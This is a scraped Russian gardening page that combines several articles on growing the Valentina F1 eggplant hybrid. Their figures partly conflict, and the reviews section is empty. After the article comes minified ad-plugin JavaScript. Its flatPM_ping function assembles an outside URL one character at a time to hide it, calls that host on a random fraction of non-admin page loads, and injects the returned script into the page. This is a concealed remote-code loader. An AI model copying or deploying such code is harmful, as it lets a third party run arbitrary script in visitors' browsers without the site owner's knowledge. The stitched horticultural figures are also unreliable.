5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Баклажан валентина описание

Характеристика баклажана Валентина

Баклажан Валентина f1 относится к раннеспеющим сортам, их выращивают как в теплицах, так и в открытом грунте. Этот сорт славится своей высокой всхожестью, урожайностью и нежным, мягким вкусом плодов, а также средней устойчивостью к заболеваниям.

Характеристика баклажана Валентина

Описание сорта

Баклажан Валентина f1 – раннеспелый гибрид с высокой урожайностью. Семена производит голландская компания Seminis. В южных областях его урожайность увеличивается в разы, для высокой урожайности в местах с более прохладным летом этот сорт высаживают в теплицах.

  • урожай спеет в июне, примерно через 2 месяца после всходов;
  • мякоть почти без семян, плотная, белого цвета, отсутствует горечь;
  • стойкий иммунитет к различным заболеваниям;
  • при неблагоприятных условиях цветы и завязь не осыпаются.

Внешний вид куста и плода

Растение невысокое, до 85 см, не нуждается в подвязывании. Форма плодов каплевидная, продолговатая. Длинна 19-26 см, а диаметр 3-6 см, вес 250-300 г.

Цвет плода фиолетово-черный, а мякоть желтовато-белая, плотная. Этот сорт баклажанов отлично подходит для консервации, запекания, горячих и холодных закусок, пригодны для употребления в сыром виде из-за отсутствия горечи.

Посев семян

Чтобы вырастить сильные и здоровые баклажаны, требуется подготовить материал на посадку, для этого есть несколько способов:

  1. Замочить их в растворе перекиси водорода для обеззараживания семян. Эту процедуру стоит проводить за сутки до посева, а раствор готовить сразу перед использованием. В стакан с теплой водой, примерно 40˚С, добавить 5-6 мл перекиси и замочить семена не более, чем на 15 минут.
  2. Прорастить семена. Создаются благоприятные условия: температура воздуха около 25˚ и повышенная влажность. Семена заворачивают в хлопчатобумажную, влажную ткань и помещают в теплое место, а после того, как семена проросли, высажавают их в торфяные горшки.

Высадка в землю

Рассаду следует высаживать в прогретую почву

Высаживать рассаду баклажанов сорта Валентина лучше в мае, когда земля прогреется до 14˚ и выше. Место под посадку выбирают хорошо проветриваемое и освещенное, а также подготовить почву.

Для наиболее обильного урожая их высаживают там, где ранее росли бобовые, бахчевые или зеленые культуры. При перекопке земли имеет смысл внести суперфосфат, калийный сульфат и древесную золу. Требуется использовать пред посадочные внесения Агро-прироста, Кемиры универсал и Растворина. Рассаду высаживают, когда стебли достигли высоты 20-25 см и у них в наличии 6-7 листочков.

На подготовленном участке земли делают лунки, глубиной 15-20 см, расстояние между саженцами примерно 40 см, междурядье 55-60 см и перед высадкой вливают 1 кружку теплой воды. Высаживать рассаду желательно с неразрушенным земляным комом, присыпать каждый кустик землей, уплотнить ее и вылить под каждый куст 400-500 мл теплой воды.

Уход за растением

Согласно описанию, это растение неприхотливо, из-за формы и размера не нуждается в подвязке. После высадки их необходимо полить через 5 дней. Растение следует поливать обильно, под корень и желательно в утреннее время. После высадки первый раз подкормить растение можно через неделю раствором Кемира-люкс.

Во время появления бутонов подкармливают куст фосфорно-калийным удобрением, а во время завязи плодов подойдут азотно-фосфатные удобрения или раствор на основе древесной золы и коровяка. После полива или дождя нужно вспушить грядку. Под каждое растение нужно вливать 2-5 л вещества.

Болезни и вредители

Чтобы предотвратить многие заболевания, свойственные пасленовым, следует соблюдать схему профилактики для защиты от болезней и вредителей. От фитофторы растение обрабатывают Квадрисом или Антраколом, а Хорусом для защиты от серой гнили.

На паслёновые часто нападает колорадский жук, но у него уже появился иммунитет ко многим ядам, поэтому желательно собирать их вручную – так есть шанс уберечь растение и не наполнить плоды вредными веществами. Соблюдение превентивных мер поспособствует хорошему урожаю и отсутствию различных заболеваний.

Сорт баклажана Валентина (F1)

Овощные гибриды являются носителями лучших характеристик, поэтому спрос на них среди огородников так велик. Голландская компания Monsanto уже много лет разрабатывает растения с удивительными возможностями. Среди них — баклажан Валентина, зарегистрированный в 2005-ом году и включённый в Госреестр растений РФ в 2007-ом году. Сорт допущен к выращиванию во всех регионах России. Рекомендован для открытого грунта и плёночных укрытий в личных подсобных хозяйствах. Хорошо зарекомендовал себя в Молдове и Украине.

Описание

Растение открытого типа с хорошими ростовыми показателями. Кустик полураскидистый, высотой от среднего до высокого. В среднем рост составляет 85 — 90 см, но в теплице может быть выше метра. Стебель не слишком толстый, опушенный, со слабой антоциановой окраской. Междоузлия короткие. Листья обычного размера, ярко-зелёные, со слегка выемчатым краем и лёгкой волнистостью. Поверхность пластины жилковатая, шершавая на ощупь. Плодоножка у сорта длинная, не толстая. Цветок фиолетовый. Чашечка светло-зелёная, с редкими шипами или без них. Корневая система баклажана сильная.

Плоды у Валентины красивые, удлинённо-грушевидной или каплевидной формы с гладкой поверхностью. Длина 26 см, диаметр — 5 см. Обычный вес — 200 — 220 грамм. Кожица тонкая, крепкая и эластичная, сильноглянцевая, тёмно-фиолетового, иногда почти чёрного цвета. Мякоть белая или кремово-белая, достаточно плотная. На вкус мягкая и нежная, не содержит горечи. Семена или отсутствуют полностью, или содержаться в малом количестве, при этом они очень мягкие. Вкусовые качества отличные, мякоть имеет диетические свойства.

Характеристики сорта

  • Баклажан раннеспелый — с момента появления всходов до начала уборки проходит около 90 дней. Если высаживать рассаду, то спелость наступает ещё раньше — через 2 месяца. Урожай поспевает ко второй декаде июля;
  • урожайность на открытой грядке составляет 3,2 кг с 1 кв. метра. В Теплице, благодаря увеличенному периоду плодоношения, этот показатель может быть превышен в несколько раз;
  • спелый овощ имеет отличный внешний вид и высокие товарные качества;
  • одним из главных достоинств Валентины является высокая устойчивость к изменениям погодных условий. Даже если на улице дождливо и прохладно, цветки не опадут, а завязь продолжит формирование;
  • высокие товарные качества не теряются ни во время длительной транспортировки, ни в период хранения. В прохладных условиях баклажаны могут лежать целый месяц, не утрачивая вкусовых свойств;
  • устойчивость к болезням очень высокая, особенно хорошо сорт сопротивляется вирусу табачной мозаики;
  • способ употребления универсальный. Спелые плоды идеально подходят для приготовления закусок и горячих блюд. Из них можно приготовить в зиму множество вкуснейших заготовок.

Особенности агротехники

В тёплом климате семена Валентины можно высевать непосредственно в грунт. Посевной материал от производителя в дополнительной обработке не нуждается. Посадку можно осуществлять в начале мая. Если погода прохладная, посевы можно накрыть плёнкой.

Чтобы получить рассаду, семенной материал баклажанов высевают в конце февраля — начале марта. В теплицу или на грядку пересаживают сеянцы, имеющие не менее 4-х настоящих листочков. Если сорт предполагается выращивать на улице, то для успешной адаптации над грядкой с пересаженной рассадой устанавливают лёгкий плёночный парник. До полного укоренения молодые растения поливают часто — 1 раз в 3 — 4 дня.

Схема посадки — до 30 см расстояние между кустами в ряду, ширина междурядий — 60 — 70 см. Глубина посева семян Валентины — не более 1,5 см. Грядку лучше всего располагать на хорошо освещённом месте, укрытом от сквозняков.

В открытом грунте растения вырастают более коренастыми и в подвязке, как правило, не нуждаются. Но в закрытом грунте подвязка нужна обязательно. Уход за баклажаном несложный, заключается в своевременном поливе, подкормке и рыхлении почвы.

Валентина — прекрасный сорт для личных хозяйств. Он неприхотлив, устойчив к заболеваниям, переносит любую неблагоприятную погоду в период вегетации. Кроме того, разновидность славится высокой урожайностью и великолепными вкусовыми качествами. Недостатком является лишь необходимость покупки семян каждый год.

Баклажан Валентина f1: описание сорта, секреты хорошего урожая, отзывы и видео

Баклажаны Валентина f1 – гибридный вид, адаптированный под выращивание в теплицах, в средней полосе России. Как показывают отзывы огородников, плоды этого сорта отличаются высокими показателями урожайности и всхожести, а так же мягким вкусом. Описание и фото баклажан Валентина f1, которые представлены в нашей статье, доказывают насколько это неприхотливое и устойчивое к вирусам растение.

Описание сорта

Баклажан Валентина f1, относится к категории раноспеющих, пригоден для выращивания как в теплицах, так и в отрытом грунте. Первый урожай уже может появиться спустя 60 дней после высадки. Кусты баклажана Валентина F1 имеют среднераскидное, высокое строение. Размер листьев в теплицах достигает до 1 м, а в естественном грунте до 80 см. Спелые плоды можно описать следующим образом:

  • форма: грушевидная, удлиненная;
  • цвет: темно-фиолетовый;
  • вес: 250-300 гр.;
  • длина спелого плода 19-26 см, диаметром 3-6 см;
  • мякоть желтовато-белая, без горечи.

Этот сорт баклажан пользуется большой популярностью на рынке, в первую очередь из-за своих вкусовых характеристик (не горчит) и неприхотливостью при выращивании.

Внимание! С 1 м² грядки можно получить около 3 кг свежих баклажан.

Как правильно высаживать

Семена «Валентина f1» продаются во всех специализированных магазинах.

  1. Перед посадкой зернам нужно дать прорости, для этого нужно создать теплые (более +25С) и влажные условия. Для этого, можно завернуть семена в натуральную хлопчатобумажную ткань, поместить в теплое место, при этом каждый день (или по мере высыхания) сбрызгивать водой.
  2. Проросший посевной материал пересаживают в торфяные горшочки в марте.
  3. Высаживать семена лучше всего в середине мая, когда температура почвы прогреется хотя бы до 14C. Для этого сначала нужно выкопать ямки, глубина которых будет зависеть от размера саженца, в среднем это 16-26 см.
  4. Молодые побеги аккуратно вытаскивают из горшочков и пересаживают в лунки, а затем аккуратно засыпают грунтом.
  5. Затем саженцы обильно поливаются водой, из расчета 0,5 л воды на одну клумбу.
  6. После этого землю перекапывают, выравнивают и утрамбовывают.

Уход за баклажаном Валентина

После посадки, первый раз полить овощи можно через пять дней. Баклажаны Валентина f1 не переносят чрезмерной сырости. Поэтому орошать землю достаточно 2-4 раза в неделю. Вода для полива должна быть отстоявшаяся, температурой 26-28 C. После орошения, верхний грунт необходимо разрыхлить.

Идеальные условия для роста баклажан: температура 28-30C, влажность не выше 70%.

В жаркие дни, если баклажаны растут вне теплицы, то землю после полива нужно сначала разрыхлить, а затем покрыть ее мульчей (солома, древесные опилки).

Первую подкормку растениям нужно вводить через 20 дней после пересадки в грунт. В качестве подкормки можно использовать готовый раствор «Кемира» (1 ч.л. на 5 л воды) или натуральные добавки (коровий навоз, древесная зола, настой трав).

Совет! Лучше всего чередовать натуральные и минеральные добавки.

Первый урожай можно собирать через 60-70 дней после пересадки, когда средний вес плода станет 200 гр.

Советы профессионалов

  1. Лучшей землей для баклажан станет смесь торфа, компоста, перепревшего навоза и песка с землей вашего региона.
  2. Чтобы повысить урожайность, землю после посадки удобряют смесью золы с мочевиной (1 ч.л. на 5 л воды) и сульфатом калия (1 ч.л. на 5 л воды).
  3. Нельзя удобрять баклажаны свежим навозом, это может испортить корневую систему куста.
  4. Молодые кусты нужно высаживать на расстоянии 40 см друг от друга по ряду, и 50 см относительно рядов.
  5. Если баклажаны высаживаются в глинистый грунт, то в почву обязательно нужно добавить крупный песок.

Отзывы садоводов

В интернете можно найти массу положительных отзывов, подтверждающих урожайность и неповторимый вкус этого сорта баклажан. Как уверяют многие хозяйки, эти баклажаны прекрасно подходят для консервации. Они совсем не горчат, быстро готовятся и практически не имеют внутри семян. Что немаловажно, этот сорт отлично приживается в тепличных условиях и устойчив к любым вирусам.

Среди негативных отзывов можно выделить то, что при длительном и не правильном хранении семян показатель всхожести будет низким.

Таким образом, баклажан «Валентина f1», можно смело назвать одним из самых неприхотливых овощей, который под силу вырастить любому садоводу-любителю. Но имейте в виду, что этот овощ очень не любит низкие температуры и чрезмерный полив.

Подготовка семян баклажана к посадке — видео

Баклажан Валентина F1

Благодаря селекционной работе на рынке семян баклажан постоянно появляются новые сорта. Баклажаны сорта Валентина F1 зарегистрированы в России в 2007 г. Выведены в голландской компании Монсанто. Этот гибрид, что характеризуется отменным вкусом, набирает популярность в среде огородников из-за раннего срока созревания и устойчивости к вирусам.

Характеристика гибрида

Баклажан Валентина F1 в условиях климата России выращивают в теплицах или под пленочными укрытиями. В южных областях кусты растут в открытом грунте. Гибрид Валентина отмечается устойчивостью к переменам погоды. Цветки в неблагоприятных условиях держатся на растении, не осыпаются, образуются завязи и плоды.

Симпатичные темно-фиолетовые длинные плоды баклажана оригинальными подвесками украшают куст гибрида уже на 60-70-й день после высадки на грядки. Самые первые, большие плоды можно срывать в июле. Урожай созревает через три месяца после появления всходов. С одного квадратного метра насаждений сорта Валентина собирают больше 3 кг овощей. Плоды баклажана Валентина F1 равномерны, славятся отличными товарными свойствами.

Плоды могут храниться приблизительно месяц в прохладном помещении, не теряя своих вкусовых качеств. Овощи используют для приготовления различных блюд и заготовок.

Важно выбрать момент кулинарной спелости баклажана. Обычно к этому времени плоды имеют насыщенный темный оттенок и глянцевый покров. Овощи с тусклой, немного побледневшей кожицей – переспелые, у них уже начинают формироваться мелкие твердые семена.

Описание растения

Кусты сорта Валентина – прямостоячие, сильнорослые, полураскидистые, поднимаются до 0,8-0,9 м. Ствол растения опушенный, отличается слабой светло-лиловой окраской. Среднего размера листья насыщенного зеленого оттенка, выемчатые по краям. Цветки большие, бело-фиолетовые.

Темно-фиолетовые плоды – удлиненные, каплевидной формы, могут вытянуться до 20-26 см. Диаметр утолщенной, нижней части плода – до 5 см, верхней – до 4 см. Масса плода достигает 200-250 г. Кожица глянцевая, тонкая, легко очищается. У плотной мякоти приятная кремово-белая окраска. В описаниях огородников, кто выращивал этот гибрид, отмечается мягкий и нежный вкус плодов, без намека на горечь.

Достоинства баклажана

В своих описаниях и отзывах овощеводы высоко оценивают качества плодов и самого растения сорта баклажана Валентина.

  • Скороплодность и урожайность;
  • Отличный вкус плодов и их товарный вид;
  • Неприхотливость растений;
  • Устойчивость к поражению вирусом табачной мозаики.

Выращивание гибрида

Приступают к высеву семян баклажан Валентина с начала марта. Обычно голландские семена продают уже покрытые специальными веществами после предпосевной обработки. Но в отзывах дачников встречаются упоминания о том, что после замачивания в стимуляторах роста семена гибрида всходили быстрее. Ускоряет всхожесть семян также замачивание в соке алоэ на полдня.

Затем семена подсушивают и проращивают.

  • Их помещают во влажные салфетки, вату или гидрогель и оставляют при температуре 25 0 С;
  • Проращенные семена гибрида аккуратно, с частью бумажной салфетки или крупинкой геля перекладывают в грунт торфяного горшочка или бумажного стаканчика.

Посев семян без проращивания

Для баклажанов гибрида Валентина надо подготовить питательную почву. Смешивают поровну землю с перегноем, торфом, опилками, обогащая состав древесной золой и карбамидом. Раствор готовят в пропорции 1 столовая ложка карбамида на 10 л воды. К глинистой почве добавляют песок.

  • Семена баклажана углубляют на 1-1,5 см, горшочки прикрывают пленкой или стеклом;
  • Температура для прорастания всходов должна быть на уровне 25-26 0 С;
  • Ростки появляются через 10 дней.

Уход за рассадой

На протяжении первых 15-20 дней молодая рассада баклажан требует, чтобы воздух прогревался до 26-28 0 С. Затем температура понижается днем на один градус, а ночью должна быть в пределах 15-16 градусов. Если погода пасмурная, дневную температуру следует поддерживать на уровне 23-25 0 С. При этом рассаду гибрида Валентина надо досвечивать – до 10 часов.

  • Воду для полива растений подогревают;
  • Почву увлажняют после подсыхания;
  • Для подкормок растений используют препарат «Кристалин». В 5 л воды растворяют 6-8 г удобрения.

Баклажаны в теплицах

В неотапливаемые теплицы и укрытия баклажаны Валентина высаживают во второй декаде мая. Следят, чтобы грунт прогрелся до 14-16 0 С. К этому времени рассада поднимается до 20-25 см, сформированы 5-7 настоящих листов.

  • Высаживая растения гибрида Валентина, придерживаются схемы 60 см х 40 см;
  • Поливать кусты баклажанов надо теплой водой 2-4 раза в неделю. После полива землю вокруг растений аккуратно разрыхляют, чтобы не повредить корешки;
  • Грунт желательно мульчировать;
  • Первую подкормку растений проводят через 3 недели после высадки. В 10 л теплой воды вливают 1 столовую ложку удобрения «Кемира универсал». Поливают по 0,5 л под корень;
  • Используют минеральные удобрения на выбор или органику: древесную золу, сброженный настой из луговых трав и сорняков, раствор навоза;
  • В конце июля просматривают все кусты баклажан, чтобы выбрать самые крупные завязи. Их оставляют, а другие удаляют, так же, как и цветы. Это делают для того, чтобы плоды быстрее созрели.

Теплицу надо проветривать, чтобы кусты баклажан не пострадали от высокой температуры. Благодаря своей устойчивости, растения гибрида Валентина сохраняют цветы и завязи, но плоды вырастают мелкие.

Баклажаны на огороде

На огород баклажаны Валентина выносят в конце мая или начале июня.

Выбирают хорошее солнечное место, где в прошлом году росли морковь, горох, фасоль, капуста, зеленные или бахчевые культуры. Эти растения считаются лучшими предшественниками для баклажанов.

  • При перекапывании грунт обогащают суперфосфатом, сульфатом калия, золой. Или добавляют перегной, компост;
  • К глинистой почве в большие лунки подсыпают песок. Баклажаны лучше развиваются на легких, но плодородных почвах;
  • Перед посадкой в почву вносят по выбору, сверяясь с инструкцией, такие удобрения, как «Рост», «Агро-прирост», «Кемира универсал» и другие;
  • Расстояние между рядами: 60-70 см, между растениями: 25-30 см;
  • Первые 7-10 дней саженцы баклажан Валентина нужно притенять, если стоит жаркая безоблачная погода. Кроме спанбонда, берут просторные картонные ящики, разбирая нижнюю плоскость, старые ведра без донышек и другие подручные материалы;
  • Растения поливают нагревшейся за день водой, утром грунт рыхлят и мульчируют.

Секреты овощеводов

Баклажаны гибрида Валентина – неприхотливая и устойчивая культура. Но следует знать накопленный опыт огородников, которые выращивали растения этого вида, чтобы получить хороший урожай.

  • После пересадки в теплицу растения первый раз поливают через 5 дней;
  • Под куст гибрида надо вылить 0,5-1 л воды, чтобы влага дошла до всех корешков растения;
  • Теплую воду льют под корень растения;
  • Рыхление должно быть поверхностным;
  • Для нормальной вегетации растениям требуется тепло до 28-30 градусов;
  • Когда начинают закладываться бутоны, баклажаны удобряют: в 10 л разводят 30-35 г аммиачной селитры и 25 г сульфата калия. Каждое растение получает не меньше 0,5 л раствора;
  • В период формирования завязей на участок с баклажанами вносят азотно-фосфорные удобрения в пропорции: 10 л воды:25 г суперфосфата:25 г калийной соли.

Как защитить баклажаны

От повышенной влажности баклажанам могут грозить грибковые заболевания.

  • Препараты «Антракнол» и «Квадрис» защитят растения от фитофторы;
  • «Хорус» – от серой гнили;
  • Для профилактики кусты баклажанов Валентина обрабатывают «Цирконом» или «Фитоспорином».

Вредители растений: колорадские жуки, паутинный клещ, тля и слизни.

  • На небольшом участке жуков собирают вручную;
  • Инсектицид «Стрела» применяют против клещей и тли;
  • Слизни уходят, если почва присыпана золой.

Труд на грядке с баклажанами принесет свои плоды уже в середине лета.

Овощи будут вкусным дополнением к столу.

Баклажан Валентина: описание сорта, фото, отзывы, характеристика, урожайность, достоинства и недостатки

Описание сорта

Характеристика плодов

Далее представлены фото баклажанов сорта Валентина :





Достоинства и недостатки

У этого сорта баклажанов есть свои достоинства, среди которых можно выделить основные:

Применение

Особенности выращивания

Посмотрите видео! Cорт баклажана Валентина

Отзывы, кто сажал

Ниже приведены отзывы тех, кто сажал баклажан Валентина . Прочитав их, вы поймете все достоинства сорта и секреты его выращивания.

Юрий, г.Москва

Наталья, г.Нижний Новгород

Марина, г.Уфа

Александр, г.Сарапул

Дина, г.Самара

Виктория, г.Казань

Ольга, г.Санкт-Петербург

Жанна, г.Казань

Если статья была полезна, поставь 5 звездочек!

(Пока оценок нет)
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};